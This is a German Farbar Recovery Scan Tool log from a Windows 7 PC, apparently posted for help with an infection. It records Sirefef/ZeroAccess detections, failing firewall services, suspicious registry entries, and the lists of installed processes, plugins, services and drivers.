Konnte Geräte nicht auflisten. Überprüfen Sie den "winmgmt" Dienst oder reparieren Sie den WMI.


==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (12/06/2015 08:28:05 AM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Nur zur Information.
(Patch task for {90140011-0066-0407-0000-0000000FF1CE}): DownloadLatest Failed:

Error: (12/05/2015 06:28:35 PM) (Source: Customer Experience Improvement Program) (EventID: 1008) (User: )
Description: 80004005

Error: (12/05/2015 07:21:50 AM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Nur zur Information.
Error:  Initialization failed 0x80070424 Type: 88::UnexpectedError.

Error: (12/04/2015 11:23:31 PM) (Source: Customer Experience Improvement Program) (EventID: 1008) (User: )
Description: 80004005

Error: (12/04/2015 11:49:35 AM) (Source: Customer Experience Improvement Program) (EventID: 1008) (User: )
Description: 80004005

Error: (12/04/2015 09:19:39 AM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Nur zur Information.
Error:  Initialization failed 0x80070424 Type: 88::UnexpectedError.

Error: (12/03/2015 09:10:05 AM) (Source: Customer Experience Improvement Program) (EventID: 1008) (User: )
Description: 80004005

Error: (12/03/2015 08:15:02 AM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Nur zur Information.
Error:  Initialization failed 0x80070424 Type: 88::UnexpectedError.

Error: (12/02/2015 03:11:26 PM) (Source: Customer Experience Improvement Program) (EventID: 1008) (User: )
Description: 80004005

Error: (12/02/2015 02:47:23 PM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Nur zur Information.
Error:  Initialization failed 0x80070424 Type: 88::UnexpectedError.


Systemfehler:
=============
Error: (12/06/2015 09:18:54 AM) (Source: Service Control Manager) (EventID: 7006) (User: )
Description: Der Aufruf "ScRegSetValueExW" ist für "Start" aufgrund folgenden Fehlers fehlgeschlagen: 
%%5

Error: (12/06/2015 09:14:55 AM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: Der Dienst "Windows-Firewall" wurde mit folgendem dienstspezifischem Fehler beendet: %%5.

Error: (12/06/2015 09:14:20 AM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: Der Dienst "Windows-Firewall" wurde mit folgendem dienstspezifischem Fehler beendet: %%5.

Error: (12/06/2015 09:11:00 AM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: Der Dienst "Heimnetzgruppen-Listener" wurde mit folgendem dienstspezifischem Fehler beendet: %%-2147023143.

Error: (12/06/2015 09:09:06 AM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: Der Dienst "Windows-Firewall" wurde mit folgendem dienstspezifischem Fehler beendet: %%5.

Error: (12/06/2015 08:26:36 AM) (Source: Service Control Manager) (EventID: 7006) (User: )
Description: Der Aufruf "ScRegSetValueExW" ist für "Start" aufgrund folgenden Fehlers fehlgeschlagen: 
%%5

Error: (12/06/2015 08:18:45 AM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: Der Dienst "Heimnetzgruppen-Listener" wurde mit folgendem dienstspezifischem Fehler beendet: %%-2147023143.

Error: (12/06/2015 08:17:15 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Das Zeitlimit (30000 ms) wurde beim Verbindungsversuch mit dem Dienst Avira Service Host erreicht.

Error: (12/06/2015 08:16:38 AM) (Source: Microsoft Antimalware) (EventID: 1119) (User: )
Description: Beim Anwenden von Aktionen auf Schadsoftware und potenziell unerwünschte Software wurde von %Virus:Win64/Sirefef.B60 ein schwerwiegender Fehler festgestellt.

Weitere Informationen finden Sie hier:
%Virus:Win64/Sirefef.B603

	Name: Virus:Win64/Sirefef.B

	ID: 2147657891

	Schweregrad: %Virus:Win64/Sirefef.B600

	Kategorie: %Virus:Win64/Sirefef.B602

	Pfad: 4.8.0204.02

	Ursprung der Erkennung: 4.8.0204.04

	Typ der Erkennung: 4.8.0204.08

	Quelle der Erkennung: %Virus:Win64/Sirefef.B608

	Benutzer: {9355F278-A3D0-4588-80FD-A0D09DE086CD}9

	Prozessname: %Virus:Win64/Sirefef.B609

	Aktion: {9355F278-A3D0-4588-80FD-A0D09DE086CD}1

	Aktionsstatus:  {9355F278-A3D0-4588-80FD-A0D09DE086CD}8

	Fehlercode: {9355F278-A3D0-4588-80FD-A0D09DE086CD}3

	Fehlerbeschreibung: {9355F278-A3D0-4588-80FD-A0D09DE086CD}4

	Signaturversion: 2015-12-05T15:10:33.658Z1

	Modulversion: 2015-12-05T15:10:33.658Z2

Error: (12/06/2015 08:16:38 AM) (Source: Microsoft Antimalware) (EventID: 1119) (User: )
Description: Beim Anwenden von Aktionen auf Schadsoftware und potenziell unerwünschte Software wurde von %Trojan:Win64/Sirefef.AH60 ein schwerwiegender Fehler festgestellt.

Weitere Informationen finden Sie hier:
%Trojan:Win64/Sirefef.AH603

	Name: Trojan:Win64/Sirefef.AH

	ID: 183690

	Schweregrad: %Trojan:Win64/Sirefef.AH600

	Kategorie: %Trojan:Win64/Sirefef.AH602

	Pfad: 4.8.0204.02

	Ursprung der Erkennung: 4.8.0204.04

	Typ der Erkennung: 4.8.0204.08

	Quelle der Erkennung: %Trojan:Win64/Sirefef.AH608

	Benutzer: {A7D7AEBF-B5BA-466E-ABC3-28444B49B17B}9

	Prozessname: %Trojan:Win64/Sirefef.AH609

	Aktion: {A7D7AEBF-B5BA-466E-ABC3-28444B49B17B}1

	Aktionsstatus:  {A7D7AEBF-B5BA-466E-ABC3-28444B49B17B}8

	Fehlercode: {A7D7AEBF-B5BA-466E-ABC3-28444B49B17B}3

	Fehlerbeschreibung: {A7D7AEBF-B5BA-466E-ABC3-28444B49B17B}4

	Signaturversion: 2015-12-05T15:10:34.872Z1

	Modulversion: 2015-12-05T15:10:34.872Z2


==================== Speicherinformationen =========================== 

Prozessor: Intel(R) Core(TM) i5-2410M CPU @ 2.30GHz
Prozentuale Nutzung des RAM: 26%
Installierter physikalischer RAM: 6123.55 MB
Verfügbarer physikalischer RAM: 4498.84 MB
Summe virtueller Speicher: 12245.24 MB
Verfügbarer virtueller Speicher: 9379.69 MB

==================== Laufwerke ================================

Drive c: () (Fixed) (Total:201 GB) (Free:57.6 GB) NTFS
Drive d: () (Fixed) (Total:241.31 GB) (Free:23.7 GB) NTFS

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (Size: 465.8 GB) (Disk ID: AECDB9E2)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=201 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=241.3 GB) - (Type=OF Extended)
Partition 4: (Not Active) - (Size=23.3 GB) - (Type=27)

==================== Ende von Addition.txt ============================
         

Code:
ATTFilter
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version:05-12-2015
durchgeführt von Steffen (Administrator) auf STEFFEN-PC (06-12-2015 12:33:39)
Gestartet von C:\Users\Steffen\Downloads
Geladene Profile: Steffen (Verfügbare Profile: Steffen)
Platform: Windows 7 Home Premium (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 9 (Standard-Browser: FF)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\NvXDSync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe
() C:\Program Files (x86)\HTC\Internet Pass-Through\PassThruSvr.exe
() C:\Program Files (x86)\CyberLink\Shared files\RichVideo.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Application Virtualization Client\sftvsa.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Launcher\Avira.ServiceHost.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.1\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.1\GoogleCrashHandler64.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Samsung Electronics Co., Ltd.) C:\Program Files (x86)\Samsung\Easy Display Manager\WifiManager.exe
(CyberLink) C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe
(Samsung Electronics Co., Ltd.) C:\Program Files (x86)\Samsung\Easy Display Manager\dmhkcore.exe
(SRS Labs, Inc.) C:\Program Files\SRS Labs\SRS Control Panel\SRSPanel_64.exe
(Microsoft Corporation) C:\Program Files (x86)\Common Files\microsoft shared\Virtualization Handler\CVHSVC.EXE
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avshadow.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
() C:\Users\Steffen\AppData\Local\Program Files\Amazon\MP3 Downloader\AmazonMP3DownloaderHelper.exe
(Sun Microsystems, Inc.) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(OpenOffice.org) C:\Program Files (x86)\OpenOffice.org 3\program\soffice.exe
(OpenOffice.org) C:\Program Files (x86)\OpenOffice.org 3\program\soffice.bin
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Launcher\Avira.Systray.exe
(SEC) C:\Program Files (x86)\Samsung\Samsung Recovery Solution 5\WCScheduler.exe
(Samsung Electronics Co., Ltd.) C:\Program Files\SAMSUNG\SamsungFastStart\SmartRestarter.exe
(CyberLink) C:\Program Files (x86)\CyberLink\Power2Go\CLMLSvc.exe
(CyberLink Corp.) C:\Program Files (x86)\CyberLink\Media+Player10\Media+Player10Serv.exe
(Samsung Electronics Co., Ltd.) C:\Program Files (x86)\Samsung\EasySpeedUpManager\EasySpeedUpManager.exe
(Samsung Electronics Co., Ltd.) C:\Program Files (x86)\Samsung\Movie Color Enhancer\MovieColorEnhancer.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(SAMSUNG Electronics) C:\Program Files (x86)\Samsung\Samsung Support Center\SSCKbdHk.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Samsung Electronics) C:\Program Files (x86)\Samsung\Samsung Update Plus\SUPBackground.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe


==================== Registry (Nicht auf der Ausnahmeliste) ===========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [11780712 2011-02-27] (Realtek Semiconductor)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2679592 2011-02-04] (Synaptics Incorporated)
HKLM\...\Run: [MSC] => "c:\Program Files\Microsoft Security Client\mssecex.exe" -hide -runkey <===== ACHTUNG (File name is altered)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [248552 2010-05-14] (Sun Microsystems, Inc.)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59240 2011-09-27] (Apple Inc.)
HKLM-x32\...\Run: [avgnt] => C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe [803200 2015-12-01] (Avira Operations GmbH & Co. KG)
HKLM-x32\...\Run: [Avira SystrayStartTrigger] => C:\Program Files (x86)\Avira\Launcher\Avira.SystrayStartTrigger.exe [66320 2015-10-14] (Avira Operations GmbH & Co. KG)
HKU\S-1-5-21-336442205-827502387-1674173946-1001\...\Run: [AmazonMP3DownloaderHelper] => C:\Users\Steffen\AppData\Local\Program Files\Amazon\MP3 Downloader\AmazonMP3DownloaderHelper.exe [400704 2013-05-22] ()
HKU\S-1-5-21-336442205-827502387-1674173946-1001\...\MountPoints2: F - F:\iStudio.exe
HKU\S-1-5-21-336442205-827502387-1674173946-1001\...\MountPoints2: {983046ff-515b-11e1-94ae-e811326e6e85} - F:\iStudio.exe
HKU\S-1-5-21-336442205-827502387-1674173946-1001\...0c966feabec1\InprocServer32: [Default-shell32] C:\Users\Steffen\AppData\Local\{2d9ad138-ebfb-785b-bdaf-9765f825eba8}\n.ACHTUNG! ====> ZeroAccess/Alureon?
Startup: C:\Users\Steffen\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OpenOffice.org 3.3.lnk [2011-11-23]
ShortcutTarget: OpenOffice.org 3.3.lnk -> C:\Program Files (x86)\OpenOffice.org 3\program\quickstart.exe ()

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{AC50C70F-596C-4BAF-9D44-0703139B7C24}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{B346C779-11C8-4C28-842C-A3D529CF4F53}: [DhcpNameServer] 192.168.42.129
Tcpip\..\Interfaces\{E420E3BF-C2A1-4233-BA32-746E24431A49}: [DhcpNameServer] 192.168.0.1

Internet Explorer:
==================
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://samsung.msn.com
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://samsung.msn.com
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://samsung.msn.com
HKU\S-1-5-21-336442205-827502387-1674173946-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.de/
HKU\S-1-5-21-336442205-827502387-1674173946-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://samsung.msn.com
SearchScopes: HKLM -> DefaultScope {9BB47C17-9C68-4BB3-B188-DD9AF0FD22} URL = 
SearchScopes: HKLM-x32 -> DefaultScope {9BB47C17-9C68-4BB3-B188-DD9AF0FD22} URL = 
SearchScopes: HKU\S-1-5-21-336442205-827502387-1674173946-1001 -> DefaultScope {0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9} URL = 
SearchScopes: HKU\S-1-5-21-336442205-827502387-1674173946-1001 -> {9BB47C17-9C68-4BB3-B188-DD9AF0FD22} URL = 
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2010-09-21] (Microsoft Corp.)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2010-09-21] (Microsoft Corp.)
BHO-x32: Samsung BHO Class -> {AA609D72-8482-4076-8991-8CDAE5B93BCB} -> C:\Program Files\Samsung AnyWeb Print\W2PBrowser.dll [2010-10-25] ()
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre6\bin\jp2ssv.dll [2011-11-23] (Sun Microsystems, Inc.)

FireFox:
========
FF ProfilePath: C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default
FF SelectedSearchEngine: Google
FF Homepage: www.google.de
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_19_0_0_245.dll [2015-11-25] ()
FF Plugin: @microsoft.com/GENUINE -> disabled [Keine Datei]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.10411.0\npctrl.dll [2012-04-11] ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_19_0_0_245.dll [2015-11-25] ()
FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll [2013-10-07] (Google)
FF Plugin-x32: @java.com/JavaPlugin -> C:\Program Files (x86)\Java\jre6\bin\new_plugin\npjp2.dll [2011-11-23] (Sun Microsystems, Inc.)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [Keine Datei]
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.10411.0\npctrl.dll [2012-04-11] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2010-11-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2010-11-09] (Microsoft Corporation)
FF Plugin-x32: @pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll [Keine Datei]
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-04] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-04] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2015-09-27] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-336442205-827502387-1674173946-1001: amazon.com/AmazonMP3DownloaderPlugin -> C:\Users\Steffen\AppData\Local\Program Files\Amazon\MP3 Downloader\npAmazonMP3DownloaderPlugin10181.dll [2013-05-22] (Amazon.com, Inc.)
FF user.js: detected! => C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\user.js [2015-12-06]
FF Extension: 20-20 3D Viewer - IKEA - C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\extensions\2020Player_IKEA@2020Technologies.com [2013-01-07] [ist nicht signiert]
FF Extension: Avira Browser Safety - C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\Extensions\abs@avira.com [2015-10-25] [ist nicht signiert]

Chrome: 
=======
CHR Profile: C:\Users\Steffen\AppData\Local\Google\Chrome\User Data\Default
CHR HKLM-x32\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [mjdepfkicdcciagbigfcmdhknnoaaegf] - C:\Program Files (x86)\Deskperience\Word Capture\wcxChrome.crx [2010-07-23]

==================== Dienste (Nicht auf der Ausnahmeliste) ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

S2 AntiVirMailService; C:\Program Files (x86)\Avira\AntiVir Desktop\avmailc7.exe [948392 2015-12-01] (Avira Operations GmbH & Co. KG)
R2 AntiVirSchedulerService; C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe [466408 2015-12-01] (Avira Operations GmbH & Co. KG)
R2 AntiVirService; C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe [466408 2015-12-01] (Avira Operations GmbH & Co. KG)
S2 AntiVirWebService; C:\Program Files (x86)\Avira\AntiVir Desktop\avwebg7.exe [1418560 2015-12-01] (Avira Operations GmbH & Co. KG)
R2 Avira.ServiceHost; C:\Program Files (x86)\Avira\Launcher\Avira.ServiceHost.exe [243968 2015-10-14] (Avira Operations GmbH & Co. KG)
S2 MBAMService; C:\Program Files (x86)\ Malwarebytes Anti-Malware \mbamservice.exe [1135416 2015-10-05] (Malwarebytes)
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [23816 2015-04-30] (Microsoft Corporation)
S3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [366544 2015-04-30] (Microsoft Corporation)
S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [1900400 2014-11-11] (Electronic Arts)
R2 PassThru Service; C:\Program Files (x86)\HTC\Internet Pass-Through\PassThruSvr.exe [166912 2013-10-17] () [Datei ist nicht signiert]
R2 RichVideo; C:\Program Files (x86)\CyberLink\Shared files\RichVideo.exe [244904 2009-12-01] () [Datei ist nicht signiert]
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2009-07-14] (Microsoft Corporation)

===================== Treiber (Nicht auf der Ausnahmeliste) ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 avgntflt; C:\Windows\System32\DRIVERS\avgntflt.sys [162072 2015-12-01] (Avira Operations GmbH & Co. KG)
R1 avipbb; C:\Windows\System32\DRIVERS\avipbb.sys [140448 2015-12-01] (Avira Operations GmbH & Co. KG)
R1 avkmgr; C:\Windows\System32\DRIVERS\avkmgr.sys [28600 2013-10-01] (Avira Operations GmbH & Co. KG)
R2 avnetflt; C:\Windows\System32\DRIVERS\avnetflt.sys [75472 2015-12-01] (Avira Operations GmbH & Co. KG)
S3 ebdrv; C:\Windows\system32\DRIVERS\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)
S3 HtcVCom32; C:\Windows\System32\DRIVERS\HtcVComV64.sys [121800 2010-03-08] (QUALCOMM Incorporated)
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2015-10-05] (Malwarebytes)
S3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [63704 2015-10-05] (Malwarebytes Corporation)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [280376 2015-03-04] (Microsoft Corporation)
S3 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [124568 2015-03-04] (Microsoft Corporation)
S3 rtport; C:\Windows\SysWOW64\drivers\rtport.sys [15144 2011-07-21] (Windows (R) 2003 DDK 3790 provider)

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2015-12-06 12:31 - 2015-12-06 12:32 - 00031477 _____ C:\Users\Steffen\Desktop\Addition.txt
2015-12-06 12:29 - 2015-12-06 12:33 - 00015426 _____ C:\Users\Steffen\Desktop\FRST.txt
2015-12-06 12:28 - 2015-12-06 12:33 - 00000000 ____D C:\FRST
2015-12-06 12:28 - 2015-12-06 12:28 - 02369024 _____ (Farbar) C:\Users\Steffen\Downloads\FRST64.exe
2015-12-06 12:26 - 2015-12-06 12:26 - 00000000 _____ C:\Users\Steffen\defogger_reenable
2015-12-06 12:24 - 2015-12-06 12:24 - 00050477 _____ C:\Users\Steffen\Downloads\Defogger.exe
2015-12-06 08:31 - 2015-12-06 09:12 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2015-12-06 08:30 - 2015-12-06 08:30 - 00001102 _____ C:\Users\Public\Desktop\ Malwarebytes Anti-Malware .lnk
2015-12-06 08:30 - 2015-12-06 08:30 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ Malwarebytes Anti-Malware 
2015-12-06 08:30 - 2015-12-06 08:30 - 00000000 ____D C:\Program Files (x86)\ Malwarebytes Anti-Malware 
2015-12-06 08:30 - 2015-10-05 09:50 - 00109272 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys
2015-12-06 08:30 - 2015-10-05 09:50 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2015-12-06 08:28 - 2015-12-06 08:29 - 22908888 _____ (Malwarebytes ) C:\Users\Steffen\Downloads\mbam-setup-2.2.0.1024.exe
2015-12-05 15:35 - 2015-12-05 15:35 - 00002117 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Security Essentials.lnk
2015-12-05 15:35 - 2015-12-05 15:35 - 00000000 ____D C:\Program Files\Microsoft Security Client
2015-12-05 15:35 - 2015-12-05 15:35 - 00000000 ____D C:\Program Files (x86)\Microsoft Security Client
2015-12-05 15:33 - 2015-12-05 15:34 - 14262464 _____ (Microsoft Corporation) C:\Users\Steffen\Downloads\mseinstall.exe
2015-11-15 12:53 - 2015-11-15 12:53 - 00000000 ____D C:\Users\Steffen\Documents\Amazon MP3
2015-11-14 13:30 - 2015-11-14 13:30 - 01197967 _____ C:\Users\Steffen\Desktop\Testbericht.pdf
2015-11-07 14:14 - 2015-12-05 11:19 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2015-12-06 12:32 - 2009-07-14 05:45 - 00014144 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-12-06 12:32 - 2009-07-14 05:45 - 00014144 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-12-06 12:31 - 2009-07-14 04:20 - 00000000 ____D C:\Windows
2015-12-06 12:26 - 2011-11-15 16:10 - 00000000 ____D C:\Users\Steffen
2015-12-06 12:23 - 2015-01-08 21:03 - 00001110 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2015-12-06 12:13 - 2012-07-02 20:24 - 00000884 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2015-12-06 09:09 - 2015-01-08 21:03 - 00001106 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2015-12-06 09:09 - 2009-07-14 06:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2015-12-06 09:07 - 2013-08-13 09:04 - 00000000 ____D C:\ProgramData\APN
2015-12-06 09:07 - 2009-07-14 04:20 - 00000000 ____D C:\Windows\Web
2015-12-06 08:30 - 2012-07-04 14:18 - 00000000 ____D C:\Users\Steffen\AppData\Roaming\Malwarebytes
2015-12-06 08:30 - 2012-07-04 14:18 - 00000000 ____D C:\ProgramData\Malwarebytes
2015-12-05 16:10 - 2009-07-14 00:19 - 00328704 _____ (Microsoft Corporation) C:\Windows\system32\services.exe
2015-12-05 15:35 - 2012-01-17 08:20 - 00001912 _____ C:\Windows\epplauncher.mif
2015-12-05 07:11 - 2009-07-14 06:08 - 00032640 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2015-12-04 22:18 - 2015-01-08 21:03 - 00004106 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2015-12-04 22:18 - 2015-01-08 21:03 - 00003854 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2015-12-03 08:10 - 2011-03-18 07:18 - 00700126 _____ C:\Windows\system32\perfh007.dat
2015-12-03 08:10 - 2011-03-18 07:18 - 00149976 _____ C:\Windows\system32\perfc007.dat
2015-12-03 08:10 - 2009-07-14 06:13 - 01622022 _____ C:\Windows\system32\PerfStringBackup.INI
2015-12-03 08:10 - 2009-07-14 04:20 - 00000000 ____D C:\Windows\inf
2015-12-01 15:05 - 2013-08-13 09:03 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avira
2015-12-01 15:04 - 2013-08-13 09:03 - 00162072 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avgntflt.sys
2015-12-01 15:04 - 2013-08-13 09:03 - 00140448 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avipbb.sys
2015-12-01 15:04 - 2013-08-13 09:03 - 00075472 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avnetflt.sys
2015-11-25 21:17 - 2012-07-02 20:24 - 00780488 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2015-11-25 21:17 - 2012-07-02 20:24 - 00142536 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
